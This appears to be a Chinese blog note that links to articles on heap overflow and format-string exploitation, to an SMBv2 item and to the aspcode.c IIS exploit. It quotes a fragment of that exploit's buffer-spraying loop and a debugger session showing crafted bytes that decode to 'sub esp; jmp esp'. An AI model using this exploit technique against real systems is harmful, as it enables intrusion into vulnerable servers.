《堆溢出的研究》：

http://hi.baidu.com/yuange1975/blog/item/1ced99ce1498353cb600c83d.html

《高级format string exploit技术P59-0x07》：

http://blog.donews.com/zwell/articles/278935.aspx

aspcode.c：

http://www.packetstormsecurity.org/0209-exploits/aspcode.c

     char buff7[]=   "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";

     char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
     char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
     char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";

     for(k=0;i<0xc000;i+=0x10)

     {
            if(i>=j) {
  
                  k=((i-j)/(MCBSIZE*8));
                  if(k<=6){
                      memcpy(buff7+0x8,buff10,8);
                      buff7[0x8]=buff8[k];
                      buff7[0xc]=buff9[k];
                  }
                  else memcpy(buff7,buff11,0x10);
            }
            memcpy(buff+i,buff7,0x10);
  
        }

/*

0x7ffdf020->0x01002120->81 ec 21 00 01 00 ff e4

0:000> e esp-100 81 ec 21 00 01 00 ff e4
0:000> u esp-100
0029f6ec 81ec21000100    sub     esp,10021h
0029f6f2 ffe4            jmp     esp

有几个人能看出来这个结果呢？

*/

smbv2:

http://hi.baidu.com/int3/blog/item/2536bfc8c216881d7e3e6ff3.html#comment